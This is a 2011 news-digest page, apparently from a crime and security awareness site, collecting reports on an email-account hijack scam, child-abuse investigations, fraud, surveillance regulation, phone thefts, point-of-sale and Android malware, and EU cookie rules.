This is how it worked. Someone, somewhere hacked into my account last month and sent a message in my name to just about everyone I know or have met in the past year, announcing that my bag, passport and credit cards had been stolen on a trip to Kuala Lumpur: I needed "quick funds" to catch the next flight home. The message offered to forward details of how to send the money (sum unspecified at this point) and provided an "alternate" e-mail address to which responses could be sent.

Implausible? It depends who you are. Most people quickly realised that I do not generally "reach out", I don't use plain "Hi" as a salutation, don't use American English spelling and don't sign myself "Timothy". On the other hand, there was just enough credibility in the way the e-mail was written and the circumstances - I do travel a bit - for a surprising number of people to "reach out" in reply.

What they didn't know was that the hacker had control of my e-mail account, had changed my password and altered my account settings to prevent me getting back in. He or she proceeded to impersonate me in several online conversations, quickly changing his sign-off to "Tim" and encouraging those at the other end to think that my situation was perilous and I needed financial help urgently (to the tune of £1,500). A telephone number was given, purporting to be that of the front desk of a well-known hotel in Kuala Lumpur.

On the strength of the e-mail exchanges and one or two snatched conversations with the Oscar-winning hotel porter, seven friends set out to make payments from nearby post offices or Western Union offices. Four rang my mobile phone just as they were about to move the funds, three went ahead and sent cash transfers (having had what they thought were bona fide e-mail exchanges), then rang me. You can imagine how I (and they) froze. Two dashed back to the counter to find that in one case they were just inside a 20-minute transaction "window", and in the other the crook (or his accomplice) had not yet picked up the cash from the designated Western Union office. Sadly, it was too late for the third, who transferred £2,000.

There were lighter moments in all this, not least the touching realisation that seven friends had responded to "my" plea for help and that many others would have done so. A gleeful call from our dear retired vicar, saying that he had stumped the villain by asking him to name three present or former churchwardens, made me smile. But on the whole, this is a depressing tale of corruption in our electronic age. Some cautionary points to remember:

Online "communities" may be far less safe than real ones.

Personal trust is cruelly exposed as blind foolishness. I now wonder what might happen if I did need rescuing in a far-flung part of the world one day.

"Accountability" seems to be lost in a moral maze. Who, ultimately, is responsible for that stolen money?

Corporations are not only increasingly faceless but voiceless. I have relished communications technology as a business writer and editor for 15 years, but last month I was suddenly trapped. Desperate to regain control of my account, I could find nothing but recorded messages in a frantic half-hour of phone calls around the world. I was unable to submit the relevant online form because (here's the Catch-22) the e-mail address and (old) password failed to match.

The law is impotent. I quickly rang the City of London fraud office but was told that a) until someone lost money there was no "victim", so no "crime", and b) "this sort of thing is increasingly common and there's not much that can be done. The guy could be anywhere".

I regained control of my account thanks only to the heroic efforts of the London-based PR advisers to the e-mail service provider, and the company's internal communications director. Without their help to convince the engineers that I was who I said I was, I don't know how much more damage the fraudster might have done. Even so, it was a full ten hours before I was able to start alerting my contacts.

My advice now is: check your settings and do all you can to improve your security: ensure that your password is as personal to you as possible, and never include password or bank details in any e-mails to family.

A broader responsibility lies with the corporations running personal and social e-mail to step up the fight against online fraud. Believe me, it's scary out there. And if some of the conversations I've had in the past few days are to be believed, it's getting scarier.

(19th March 2011)


 

"WORLD LARGEST PAEDOPHILE RING" UNCOVERED
(BBC News, dated 16th March 2011 author Dominic Casciani)
www.bbc.co.uk
Category : child abuse

International police led by a UK team say they shut down the largest internet paedophile ring yet discovered.

The global forum had 70,000 followers at its height, leading to 4,000 intelligence reports being sent to police across 30 countries.

The operation has so far identified 670 suspects and 230 abused children.

Detectives say 184 people have been arrested - 121 of them were in the UK. Some 60 children have been protected in the UK.

The three-year investigation, Operation Rescue, was led by investigators from the UK's Child Exploitation and Online Protection Centre (Ceop).

Speaking at a news conference at The Hague in the Netherlands, investigators said the network hid behind a legal online forum which operated out of the country - but its members came from around the world.

Along with the Netherlands and the UK, suspects have been identified in Australia, Italy, Canada, New Zealand and Thailand.

The members of the network went into a private channel, boylover.net, and then used its secret systems to share films and images of abused children, said Rob Wainwright, director of European police agency Europol.

However, child abuse investigators, including a team from Ceop, had already infiltrated the network and were posing as paedophiles to gather intelligence. Massive paedophile ring uncovered

In the UK, the 240 suspects include police officers, teachers and a karate teacher. One of the suspects in the UK is a woman.

To date, 33 have been convicted, including John McMurdo, a scout leader from Plymouth. Another forum user was Stephen Palmer, 54, of Birkenhead, who shared abuse images with contacts in the US. A third man, 46-year-old Colin Hoey Brown of Bromsgrove, was jailed for making and distributing almost 1,000 images.

'New ground broken'
 
Peter Davies, head of Ceop, said: "The scale and success of Operation Rescue has broken new ground.

"Not only is it one of the largest operations of its kind to date - and the biggest operation we have led - it also demonstrates the impact of international law enforcement agencies working together with one single objective, to safeguard children and bring offenders to justice.

"While these offenders felt anonymous in some way because they were using the internet to communicate, the technology was actually being used against them.

"Everything they did online, everyone they talked to or anything they shared could and was tracked by following the digital footprint."

Operation Rescue began when Ceop and colleagues in the Australian Federal Police separately identified the site as a key online meeting place for abusers.

The two forces deployed officers to infiltrate the site and to identify the members who were posing the most risk to children.

One of the early breakthroughs in the investigation was the arrest of four suspects in Thailand in 2008. Two of the men were British.

In March of the same year, Ceop identified the owner of the site and the location of its server in the Netherlands. The owner of the server is now co-operating with Dutch police.

Rob Wainwright of Europol said the man running the server had used "advanced security techniques" which took months to break down.

"If you think you can use the internet to abuse children you are wrong," he said.

"We will not allow these offenders to carry on committing these awful crimes against young children. We will not rest until we have identified every offender that has been active in this network and others that might be operating on the internet."

(16th March 2011)


CEOP SECURES CONVICTIONS IN CAMBODIA
(Police Oracle, dated 14th March 2011 author Cliff Caswell)
www.policeoracle.com
Category : child abuse

 

Officers at the Child Exploitation and Online Protection Centre (CEOP) have said they are pleased after assisting Cambodian counterparts in investigations that took two British nationals involved in offences against children out of circulation.

Matthew Harland (38) and 53-year-old Nick Griffin are now starting in prison sentences in the Asian country after the agency helped secure the two convictions in as many days.

Harland, wanted on suspicion of possessing child abuse images in the UK, will spend seven years behind bars. Griffin - who ran orphanages in a Cambodian tourist hotspot - is serving two years with one suspended for offences against children.

A statement from CEOP revealed how Harland had been arrested by Hampshire Police in December 2005 but had skipped bail and left the UK.

But last year the Centre received intelligence from the non-governmental organisation Action Pour Les Enfants (APLE), which works with CEOP through its International Child Protection Network. The information suggested Harland had surfaced in Cambodia and had offended against two young girls.

Harland was arrested there on May 20 and UK officers deployed to Cambodia after calls for assistance from the country's police.

The CEOP team worked with their counterparts and shared critical intelligence. They also implemented a child protection strategy to ensure the two victims received safeguarding and support, assisted with the forensic examination of computer equipment and helped to prepare the prosecution case.

Griffin, from Wales, ran a number of orphanages in Siem Reap. He left Britain in 2006 and set up the Cambodia Orphan Fund before being arrested in October last year following joint investigations between the Cambodian authorities, CEOP and APLE.

Speaking during a visit to Cambodia, Peter Davies, the Lead Police Officer who heads up CEOP, said he is satisfied at the securing of two major results.

He added: "Two convictions in two days shows that this crime will not be tolerated no matter where in the world you think you can go to escape capture. These are major convictions and show the severity in which we all view this crime.

"I am here seeing at first hand the work we have been doing building an International Child Protection Network - all dedicated to forming partnerships, sharing expertise and working collaboratively to bring such offenders to justice."

(16th March 2011)


CHILD TRAFFICKING IN SCOTLAND "IS HIDDEN SCANDAL"
(Guardian, dated 13th March 2011 author Billy Briggs)
www.guardian.co.uk
Category : child abuse

 

At least 80 children have been trafficked to Scotland to face sexual exploitation and other forms of abuse including forced labour, benefit fraud and domestic servitude, a report published today says.

The findings conclude that these cases are the tip of an iceberg, with many more child victims who have been sold, stolen and transported thousands of miles remaining unidentified.

The report - Scotland: a safe place for child traffickers? - criticises police for failing to secure a single conviction for trafficking, and the authorities for their poor response to young victims'needs.

In November, it emerged that a young Nigerian girl had been trafficked to Scotland, held prisoner and gang-raped. Her case was just one of several documented by the Scottish Refugee Council.

Some of the children identified have been forced to work in cannabis factories and private homes and pose as dependents for benefit scams. They came from a number of countries including China, Sudan, Somalia, Kenya, the

Democratic Republic of the Congo and Vietnam. The youngest was 14 years old.

Child trafficking has long been considered an issue of border control, the study said, leading to those who have been trafficked being regarded as part of a problem, rather than as victims.

Scotland's commissioner for children and young people, Tam Baillie, and the Centre for Rural Childhood at Perth College University of the Highlands and Islands produced the report, and made a number of urgent recommendations.

They called on the UK government to review the national referral mechanism to strengthen co-operation between government agencies, and to appoint an independent human trafficking rapporteur accountable to the UK parliament.

The authors recommended the Scottish government should ensure adequate resources are available to tackle the problem and act as a lead for local authorities to ensure that nationally agreed procedures are followed consistently at a local level.

Baillie said: "When children are raped or exploited as slaves in households or businesses in Scotland it becomes our national scandal. When we fail to notice, fail to pick up the signs and fail to act on children's trauma, it demands action. I hope this report, the first of its kind in Scotland, will take the issue out into the open and result in action and change for child victims of trafficking."

Professor Rebecca Wallace, director of the centre for rural childhood at Perth College UHI, said the report's findings address the previous lack of an evidence base regarding child trafficking in Scotland. She added the study was an opportunity to "harness the very evident willingness of professionals encountered during the research to improve the identification and treatment of children trafficked into and within Scotland".

(16th March 2011)


 

UK PENSIONERS CONNED IN £100m FRAUD
(Guardian, dated 11th March 2011 author David Batty)
www.guardian.co.uk
Category : fraud

A multimillionaire faces up to 20 years in a US jail after admitting he had conned thousands of British pensioners out of their life savings.

Richard Pope, 53, enjoyed fast cars, yachts and private jets paid for by the sale of fake shares to more than 2,300 victims by his international criminal gang. One victim alone lost more than £800,000, in what was estimated to be a £100m scam.

As Pope pleaded guilty to conspiracy at a Florida district court, British police said his cold criminality had left hundreds of people destitute, many of them retired people in the UK. Detective Superintendent Bob Wishart said: "He and the guys who did this are on a par with some of the most ruthless villains out there."

Wishart, part of the City of London police's economic crime directorate, had led the investigation in partnership with US homeland security investigation of Tampa and the US secret service.

"The [victims] did not deserve what they have got; they thought they were going to be able to look after their families for years to come with this," he said. "But instead many of them have ended up divorced, homeless, or have had to come out of retirement and get jobs. For some of these people there will be no closure. This has scarred them for life. The psychological effects cannot be underestimated. It is the worst case I have dealt with."

Pope's gang stole the identity, history and shareholder base of dormant, publicly trading companies in America before coldcalling investors using "high pressure and misleading sales techniques", in what is known as a "boiler room" scam.

Pope helped sell fake shares and options to unsuspecting investors between 2004 and 2008 through operations in Spain.

One of four businesses in the scam was Mobilestream, a worthless entity sold as an up and coming company. Websites and glossy brochures were used to lend credibility to fake investment opportunities.

"Many of the [victims] were left penniless, some even destitute," an investigating officer said. "The stolen money was funnelled off into US bank accounts, where it was reinvested by financiers and enjoyed by the gang leaders."

While the fraud in the indictment totalled £80m, detectives believed the actual total was well in excess of £100m.

Boiler room scams are thought to cost the UK around £200m a year.

Pope spent two years on the run before his arrest at an undisclosed location in Spain, police said. He was charged in March 2009 by US authorities with six other defendants, two of them also Britons: Paul Gunter and Simon Odoni. The other defendants await trial.

Pope agreed to pay more than £26m in restitution, and to help prosecutors and testify against his co-conspirators, the Tampa Tribune reported. US district judge Richard Lazzara postponed his sentencing until completion of the case.

(16th March 2011)



GOVERNMENT PROPOSES NEW PRIVACY WATCHDOG TO MONITOR CCTV
(Courtesy of : Computer Active, dated 9th March 2011 author Dinah Greek)
www.computeractive.co.uk
Category : surviellance

 

The Government is asking the public for its views on proposals to create a new privacy watchdog to monitor surveillance technologies.

In a Home Office consultation document on a Code of Practice relating to surveillance cameras put forward as part of the Protection of Freedoms Bill, a Surveillance Camera Commissioner (SCC) would enforce a new code of practice on the use of technologies such as CCTV and Automatic Number Plate Recognition (ANPR).

The proposals suggest that the remit of the new SCC could include ruling whether it is necessary to install surveillance camera equipment, as well as safeguards and privacy. Initially, according to the Home Office, its remit would only cover systems that are under the control of local authorities and police forces.

But eventually other organisations may fall under its control. The Information Commissioner's Office (ICO) current CCTV code of practice, which provides guidance and advice for CCTV users on how to comply with the Data Protection Act, could be merged into the new code at some point.

"That is an area we are consulting on," a Home Office representative said.

The Government admitted that there would, at least initially, be "a strong overlap of areas of interest" between the new Commissioner and the ICO. This has led the ICO to express concerns about this and said it could cause "conflict" and "confusion".

In the evidence submitted by the Office of Fair Trading to the Public Bills Committee on the Protection of Freedoms Bill, the privacy watchdog said: "In order to have an effective, transparent and consistent regulatory framework, it is essential that all the commissioners who have a role in overseeing camera surveillance have clear and complementary roles.

"Otherwise there is a risk that regulation becomes fragmentary, confusing and contradictory, especially if commissioners take different approaches."

However, a Home Office representative said that although there is some regulatory control on the use of CCTV and APNR, this is specific and therefore limited.

It said the growth in the use of these surveillance technologies had to balance the benefits they can provide privacy issues.

Regulating CCTV usage "would restore public confidence" and "data protection" would remain under the ICO's remit we were told.

"The Surveillance Camera Commissioner's role will be to promote, provide advice on and review the operation of the code, and he will be able to draw attention to any gaps in the code, or to make recommendations to ministers as he sees fit," said the Home Office.

However Alex Hanff, campaign organiser for Privacy International was not convinced.

"I have no great love for the ICO and don't think it does a good job in protecting people's privacy, but I don't see things changing with a new organisation," he said.

The Home Office said funds for the new organisation "would not exceed provision made for the current interim CCTV Regulator," which is currently up to £250,000 per annum. Forensic Science Regulator Andrew Rennison was appointed to this position in December 2009.

The public consultation on proposals to create a new privacy watchdog, which started on 1st March, will run for 12 weeks until 25th May and information on the proposed code of practice can be accessed on the Home Office website.


 

Additonal Information

The proposed Bill doesn't just cover CCTV. The Protection of Freedoms Bill will cover a raft of privacy issues :

*brings in a new framework for police retention of fingerprints and DNA data, and requires schools to get parents' consent before processing children's biometric information.
*introduces a code of practice for surveillance camera systems and provides for judicial approval of certain surveillance activities by local authorities.
*provides for a code of practice to cover officials' powers of entry, with these powers being subject to review and repeal.
* outlaws wheel-clamping on private land.
* introduces a new regime for police stops and searches under the Terrorism Act 2000 and reduces the maximum pre-charge detention period under that Act from 28 to 14 days.
* restricts the scope of the 'vetting and barring' scheme for protecting vulnerable groups and makes changes to the system of criminal records checks.
* enables those with convictions for consensual sexual relations between men aged 16 or over (which have since been decriminalised) to apply to have them disregarded.
* extends Freedom of Information rights by requiring datasets to be available in a re-usable format
* repeals provisions (never brought into force) which would have allowed trial without a jury in complex fraud cases.
* removes time restrictions on when marriage or civil partnership ceremonies may take place.
For details of the public consultation go to :

http://www.parliament.uk/business/news/2011/february/second-reading-of-protection-of-freedoms-bill/

(16th March 2011)


 

MASSIVE SURGE IN IPHONE MUGGINGS ON LONDON'S TRAINS
(Evening standard, dated 10th March 2011 author Justin Davenport)
www.thisislondon.co.uk

Commuters were warned today to be on alert for robbers who are targeting people carrying iPhones on trains in London.

Detectives have released CCTV images of two robbery suspects after a series of phone snatches on trains and at stations.

A surge in robberies in the capital has been partly driven by the popularity of expensive gadgets such as iPhones, BlackBerries and iPads.

Experts say smart phones, particularly iPhones, are popular among muggers because they can easily be sold abroad for hundreds of pounds. Street robberies in London rose by more than eight per cent last year, and the number of times mobiles were stolen in muggings increased by 22 per cent.

The British Transport Police Robbery Squad is warning passengers to remain vigilant after phone snatches in south London.

Detectives have confirmed that the same two suspects have struck at least six times though they suspect they may have carried out more attacks.

Each time, the robbers use the same tactic of scouting for victims on trains or station platforms. If they spot someone on an iPhone they walk up and snatch it, using force if challenged.

Police say they are investigating robberies at Catford Bridge, West Dulwich, Mitcham Eastfields and Balham between Saturday January 1 and Thursday February 10.

Detective Constable Gary Bellinger said: "We believe the men pictured in the CCTV images have snatched phones from passengers on trains across south London on at least six occasions, and we are investigating whether they've been involved in any further incidents.

"Typically they walk through trains scouting for potential targets, namely passengers talking on their phones because they are more likely to be distracted.

"After singling out their victim they snatch the phone, using violence if they are met with any resistance, before making a quick escape while the train has stopped. "We've made enquiries and followed up on a number of leads to try and get names for these men, but to no avail so far."

Police are urging people to take simple precautions such as being aware of people around you when using phones in public.

Detective Chief Inspector Martin Ford of the National Mobile Phone Crime Unit urged people to use the security features on smart phones.

He said: "Many smart phones have very high levels of security and people should be aware of this and use it to protect their phones and the information and data they carry on their phones these days."

Anyone with information about the robbery suspects should call British Transport Police on
Freefone 0800 40 50 40 (quoting reference B10/LSA of 9/3/11) or ring Crimestoppers anonymously on 0800 555 111.

For for article and photo's of suspects :

http://www.thisislondon.co.uk/standard/article-23930782-surge-in-iphone-muggings-on-londons-commuter-trains.do

For better quality photo's of suspects :

http://www.lbc.co.uk/iphone-snatchers-on-south-london-trains-37245

(12th March 2011)




NEVER MIND THE PRODUCTS, EDUCATE THE USERS
(IDG News Service, dated 2nd March 2011 author Peter Sayer)
www.idg.com

 

If they could change one thing to improve IT security, the assembled experts on a panel at Cebit would better educate their users.

"Education is important: We're all too naïve," said Eddy Willems, global security officer for G Data Software, speaking in a panel session on security during the Cebit Global Conference, part of the Cebit trade show in Hanover, Germany, on Wednesday.

"People need to take security seriously. We can do a lot at a technological level, but if they choose a weak password, they are at risk," said Joachim Schaper, vice president of research at AGT Germany, which provides physical, as well as IT, security services.

Richard Marko, CEO of ESET, an antivirus software vendor based in Bratislava, Slovakia, would rather users kept their data where his desktop security products can see it: "I wish users would think twice before they decide what it is appropriate to put into the cloud," he said.

However, improved user education can only accomplish so much: IT systems developers also need to make systems simpler to use safely.

"If you want millions of people to use a service, it needs to be easy, without the need for them to install more software," said Georg Rau, senior vice president at Deutsche Post, another panellist.

But the obligation isn't only on customers to learn: it's also on suppliers to inform. Buyers can't make educated decisions about how to set up and run their IT infrastructures unless vendors supply them with the necessary information.

Nowhere is that more the case than in the market for cloud computing services, where vendors vaunt the fact that their customers don't need to know how things work.

"We need transparency from cloud computing providers. We should know how their systems are organized, and we should know about the people they hire," said Natalya Kaspersky, chairperson at Kaspersky Lab.

She wants to see more transparency in such services, and better standards for security practices, so that customers can evaluate service providers.

"If the level of security and transparency is very high, I may be willing to pay more. If I don't care about security, I can pay less. But I should have that choice," she said.

Schaper drew a comparison with the automobile industry, where manufacturers spend millions conducting crash tests to demonstrate the safety of their vehicles. Because the tests are standardized across the industry, the results can be compared: That's important, he said, because safety might be a decision factor when purchasing a car.

While the vendors of IT systems in general, and of security products and services in particular, do conduct tests of their products, these are not always directly comparable, Schaper warned. "If you go to other providers, they might have a different standard," he said. "It still needs a lot of work from vendors to make these tests transparent and standard."

The chairman of the panel session, Martin Gutberlet of analyst firm Gartner, came to the same conclusion.
"There's still a lot of work to do on standards and certification" of security practices, he said. But, he wondered, "Are we willing to pay for it?"

(12th March 2011)


 

CYBERCRIMINALS TARGETING POINT-OF-SALE DEVICES
(IDG News Service, dated 3rd March 2011 author Jeremy Kirk
www.idg.com

Point-of-sale payment processing devices for credit and debit cards are proving to be rich targets for cybercriminals due to lax security controls, particularly among small businesses, according to a report from Trustwave.

Trustwave, which investigates payment card breaches for companies such as American Express, Visa and MasterCard, conducted 220 investigations worldwide involving data breaches in 2010. The vast majority of those cases came down to weaknesses in POS devices.

"Representing many targets and due to well-known vulnerabilities, POS systems continue to be the easiest method for criminals to obtain the data necessary to commit payment card fraud," according to Trustwave's Global Security Report 2011.

POS devices read the magnetic stripe on the back of a card that contains account information, which is then transmitted for payment processing.

Although there are rules for security controls that developers should use for the devices, such as the Payment Application Data Security standard (PA-DSS), Trustwave said that "these controls are rarely implemented properly."

Further, many small businesses rely on third-party integrators to support the POS devices. But those integrators often have poor security practices. In 87% of the breach cases it studied, the integrators make mistakes such as using default credentials in operating systems or with remote access systems, Trustwave said.

"In our experience, many POS integrators are often not skilled in security best practices, leaving their clients open for attack," the report said. "For instance, our investigations often uncover deficiencies in regards to basic security controls, such as the use of default passwords and single-factor remote access solutions."

POS devices are an attractive target for cybercriminals since the data they access from the cards is more complete, Trustwave said. For example, an attack against an e-commerce website may yield a credit card number and the card's expiration date -- information that can only be used in so-called card-not-present fraud, such as buying goods on a website that never sees the physical card or its magnetic strip.

But POS devices collect the full magnetic strip, which makes it possible, for example, to encode that information on a dummy card for use at an ATM machine or a retailer.

Retailers have been increasing their compliance with the Payment Card Industry Data Security Standard (PCI-DSS), a code of best practices created by the card industry. It forbids, for example, the storing of magnetic strip data on POS terminal and mandates the use of encryption.

But in 2010 Trustwave discovered new malware targeted at POS applications, one of which was capable of extracting that encrypted data.

"The POS-specific malware is the most sophisticated malware we have seen, and similar to the ATM malware we saw in 2009, as it requires deep knowledge about the workings of the POS application," Trustwave wrote.

Even though PCI-DSS is well established in North America and Europe, "these mandates are just beginning to take hold in other regions," Trustwave wrote. "For example, Latin America and Asia Pacific still lag behind other areas of the world in the identification and acknowledgement of a data breach, which adversely affects the global effort to combat attacker behavior."

Trustwave website : https://www.trustwave.com/

(12th March 2011)


 

FRENCH GOVERNMENT GIVES MORE DETAILS OF HACKING
(IDG News Service, dated 8th March 2011 author Peter Sayer)
www.idg.com

IDG News Service - The French National IT Systems Security Agency released further details of the recent attack on French government computers, saying they were targeted by cyberspies.

Around 150 IT staff spent the weekend on a massive cleanup operation to undo the effects of the attack on computers at the French Ministry of Economy, Finances and Industry, the security agency's director-general said Monday night.

The attack compromised around 150 of the ministry's 170,000 PCs, agency director-general Patrick Pailloux said at a press conference.

The attack began with a wave of e-mail messages with malware-laden attachments that exploited then-unknown or unprotected flaws in the software running on the ministry's PCs. The messages were addressed to ministry staff of all levels, and purported to come from colleagues or regular correspondents elsewhere, while the attachments appeared to relate to their work, Pailloux said.

When the attachments were opened, they installed Trojan horse software on the PCs. Under the control of the unidentified attackers, that software was then used to compromise other PCs, to send data out of the ministry hidden in other Internet traffic, and finally to cover up its activities.

The attackers had access to mailboxes and servers over the course of several weeks. It took the agency until last week to figure out what the Trojan horse was doing, and just how far it had spread, Pailloux said.

While attacks on other French government computers were made during this time, none of them appeared to have succeeded, he said.

The technical level and coordination of the attacks on the Finance Ministry show that the hackers were determined and organized professionals, he said.

After disconnecting the ministry from the Internet, it took 150 IT staff all weekend to clean up and strengthen security systems before bringing the Internet connection back up on Monday morning, Pailloux said.

Pailloux declined to comment on who might be behind the attack, although he did acknowledge that it resembled an attack on Canadian government IT systems last month. That attack was initially blamed on the Chinese, an accusation the Chinese swiftly denied.

French Budget Minister François Baroin said this latest attack was probably from outside France: "We have some leads, but at this stage it's impossible to confirm them," he said in a radio interview Monday morning.

There is no sign that personal tax files were targeted, Baroin said, something later confirmed by the security agency.

"What was targeted, it seems, was the organization of the G20 as, so it seems, happened during the organization of the previous G20," Baroin said.

The G20, or Group of 20, meetings brings together the finance ministers and central bank governors of 19 countries and the European Union. In addition to the E.U., the G20 members are Argentina, Australia, Brazil, Canada, China, France, Germany, India, Indonesia, Italy, Japan, Mexico, Russia, Saudi Arabia, South Africa, South Korea, Turkey, the U.K. and the U.S.

In October, news reports claimed that the G20 conference in Seoul was targeted by North Korean hackers.

The latest incident, Baroin said, shows that companies are not the only targets of economic espionage: It can also happen to states. "This is just one more incident, a confirmation that we, too, need to protect our IT systems," he said.

(12th March 2011)


 

VERIFONE SEEKS RECALL OF SQUARE CREDIT CARD READERS
(computer World, dated 9th March 2011 author Jaikumar Vijayan)
www.computerworld.com

In a highly unusual move, electronic payment vendor VeriFone Wednesday said it found a "gaping" security hole in a free plug-in mobile credit card reader from Square, a startup launched by Twitter founder Jack Dorsey.

In an open letter to "industry and consumers," VeriFone CEO Doug Bergeron called on Square to recall the devices because they pose a serious security threat to consumers.

Square, co-founded by Dorsey and Jim McKelvey in late 2009, offers a free device that can be plugged into the headphone jack of an iPhone, iPad or Android phone to instantly convert the device into a credit card reader.

Bergeron said Square's card readers don't encrypt cardholder data as a payment card is swiped through the device. The vulnerability would allow criminals to write and use applications that can download credit card data to a mobile phone.

In a YouTube video, Bergeron said it took less than an hour for VeriFone personnel to write an application that could be used skim or steal unencrypted cardholder data as its swiped through a Square card reader.

VeriFone has posted a sample skimming application for download by anyone who wants to verify how easy it would be to steal card data from a Square card reader. Bergeron said that VeriFone sent a similar app to Visa, MasterCard, American Express and the other payment card companies.

"If the industry allows Square and others to short-circuit security best practices, it will seriously jeopardize the integrity and security of the payment infrastructure," Bergeron said. Square did not respond to a request for comment on VeriFone's charges.

Square touts its card readers as devices that can easily be used by taxi drivers and seasonal market and street vendors to accept credit card payments. "You can even have your friend that owes you $20 pay you with their card, since their wallet always seems to be empty when you remind them," the company says in a note on its site.

Square currently accepts U.S.-issued MasterCard, Visa, American Express, and Discover cards and charges a flat 2.75% for all swiped transactions. Anyone can register for the service by simply providing Square with a physical address, a Social Security number and a U.S. bank account number.

Gartner analyst Avivah Litan said Square currently processes card transactions valued at between $2 million and $10 million each week. The company has set a goal of processing $1 billion in card transactions in 2011, Litan said.

The Square service was officially launched in October 2010 and claimed some 165,000 active accounts as of January, Litan said.

Paul Rasori, senior vice president of global marketing at VeriFone, today said the company decided to make its claims public because the number of free Square card readers in use continues to grow.

VeriFone sells a similar device and fears that consumers will abandon all such technology due to potential security problems, he said. "They have been sending out these card skimmers to anyone who asks for them," Rasori said. "They have created a huge problem. We felt compelled to nip it in the bud."

Rasori said that VeriFone's mobile card reader encrypts cardholder data the moment a card is swiped, keeping it safe from malicious applications created to steal card data.

He said that VeriFone did not formally notify Square about its security concerns prior to going public with them today. He contended that Square has known about this issue for some time.

Litan and others, though, faulted VeriFone's approach and said it was unusual for a technology vendor to disclose a security vulnerability publicly before giving the other a chance to respond.

"We don't see this very often. You can't help but wonder if this is all being driven by competitive worries," she said. "Square is a very unique payment system, and credit card brands are worried about all this innovation" and the threat it poses to traditional payment systems, she added.


 

Additional information

Square is a mobile payment services company launched by Twitter founder Jack Dorsey and Jim McKelvey in 2009. The company distributes a small, free dongle that people can stick into the headphone jacks of their iPhone, iPad or Android devices and start using instantly to accept credit card payments. The device reads the magnetic strip on credit cards. The service appears to be for US only, looking at the security I can understand why !


Further article on subject : http://cwonline.computerworld.com/t/7234030/753476122/374943/0/

Square website : https://squareup.com/

(12th March 2011)


 

MALWARE AD HITS LONDON STOCK EXCHANGE WEB SITE
(IDG News Service, dated 1st March 2011 author Robert McMillan)
www.idg.com

Visitors to the London Stock Exchange's Web site were hit with malicious ads over the weekend, designed to pop up fake security messages on their computers.

The culprit was an online advertisement that was somehow placed on the Unanimis ad network, which is used by the the Web site, a London Stock Exchange spokeswoman said Monday. "We had an advert on the site that linked through to a third-party website that was hosting this malware," she said. She did not know how many people had been served the malicious ad.

The Stock Exchange's Web site itself was not compromised, and the ad was removed as soon as it was discovered on Sunday, she said.

Nevertheless, visitors to the site early Monday were greeted with browser warnings saying that londonstockexchange.com had been reported as an attack page. The warnings showed up in the Firefox, Chrome and Safari browsers, but were removed later in the day.

"The malware was a classic spoof antivirus program which used a software vulnerability to download and install native executable code," said Paul Mutton, a researcher with Web analytics firm Netcraft, who reported the issue on his personal blog.

The malware pops up a message on the victim's computer that reads "Warning! You're in danger! Your computer is infected with spyware." This is a common type of malicious program, called "rogue antivirus," which is designed to trick the user into paying for useless antivirus software. Typically the victim ends up handing money over to the scammers, but the malicious software doesn't really go away.

In an online chat, Mutton said he did not know what bug the hackers used to install their malware. He also said he couldn't discuss the incident further.

In a brief statement, Unanimis said it had found malware "which affected some advertisements on our network." Unanimis is owned by European telecommunications giant Orange France Telecom Group.

Security experts say that criminals have become adept at sneaking onto online ad networks in recent years. In December, Google's ad network was hit with a similar type of malware. That attack lasted for about five days, according to security vendor Armorize.

Computerworld's Gregg Keizer contributed to this story.

(12th March 2011)


 

 

HACKING ALERT ON GOOGLE PHONE
(Metro, dated 8th March 2011 author Fred Attewill)
www.metro.co.uk

New fears have been raised over the security of smartphones after Google was forced to admit that up to 260,000 handsets have been hacked.

The threat was exposed when Google had to activate a remote 'kill switch' to delete up to 58 free apps from phones running its Android software without users' permission.

The technology giant has now sent warnings to all customers who had downloaded malicious applications which could take control of their handsets and steal personal information.

Security expert Mikko Hypponen said the incident had exposed Google's lack of vetting of apps.

He told Metro: 'I do think Android phones are more vulnerable than any of the other major smartphones out there at the moment.'

Android software is used worldwide by phone manufacturers such as Samsung and HTC. Nearly 33million handsets were shipped out of factories in the fourth quarter of last year, putting them ahead of Nokia's rival Symbian and more than double the number of Apple iPhones.

But Google has long been criticised for failing to match the scrutiny of its rivals, which vet apps made available for their phones.

The rogue apps, which included titles such as Magic Strobe Light, Photo Editor, Super Ringtone Maker, Super Guitar Solo, Color Blindness Test and Sexy Legs, were infected with a particularly sophisticated malware called DroidDream.

Apart from accessing personal data, it could have been used to send spam texts or call premium rate numbers - and owners would only have known when they were sent their phone bill.

Peter Pachal from PCMag.com said Google's quick response to the latest security alert was impressive.

He added: 'But going into my phone and erasing software - no matter how bad it may be - strikes me as a vaguely Orwellian thing to do.'

(8th March 2011)


 

NEW NET RULES SET TO MAKE COOKIES CRUMBLE
(BBC News, dated 8th March 2011)
www.bbc.co.uk/news/technology-12668552

The way websites track visitors and tailor ads to their behaviour is about to undergo a big shake-up.

From 25th May 2011, European laws dictate that "explicit consent" must be gathered from web users who are being tracked via text files called "cookies".

These files are widely used to help users navigate faster around sites they visit regularly.

Businesses are being urged to sort out how they get consent so they can keep on using cookies.

Track changes
 
The changes are demanded by the European e-Privacy directive which comes into force in the UK in late May.

The section of the directive dealing with cookies was drawn up in an attempt to protect privacy and, in particular, limit how much use could be made of behavioural advertising.

This form of marketing involves people being tracked across websites, with their behaviour used to create a profile that dictates the type of adverts they see.

As part of its work to comply with the directive, the IAB - an industry body that represents web ad firms - created a site that explains how behavioural advertising works and lets people opt out of it.

The directive demands that users be fully informed about the information being stored in cookies and told why they see particular adverts.

However, the directive is likely to have an impact on the more general use of cookies that remember login details and enable people to speed up their use of sites they visit regularly.

It could mean that after 25th May, users see many more pop-up windows and dialogue boxes asking them to let sites gather data.

Data delay
 
The exact steps that businesses have to go through to comply with the law and gain consent from customers and users are being drawn up by the Department for Culture, Media and Sport (DCMS).

A spokesman for the DCMS said that work on the regulations was "ongoing" but that the technique solutions would not be complete by 25th May.

In a statement, Ed Vaizey, minister for Culture, Communications and the Creative Industries, said he recognised that the delay would "cause uncertainty for businesses and consumers".

"Therefore we do not expect the Information Commissioner's Office (ICO) to take enforcement action in the short term against businesses and organisations as they work out how to address their use of cookies," he added.

Information Commissioner Christopher Graham said: "I cannot bark at the industry at the moment because I have not got the regulations."

However, Mr Graham stressed that the government's confession that the regulations will be delayed should not be a spur to inaction.

"My message is that this is not your 'get out of jail free' card," he said.

The response to complaints about firms that flout the directive will be viewed in light of what they have done to prepare for it, continued Mr Graham.

Businesses should be considering how they will communicate with customers to get consent and look at the technical steps that might make that process easier, he explained.

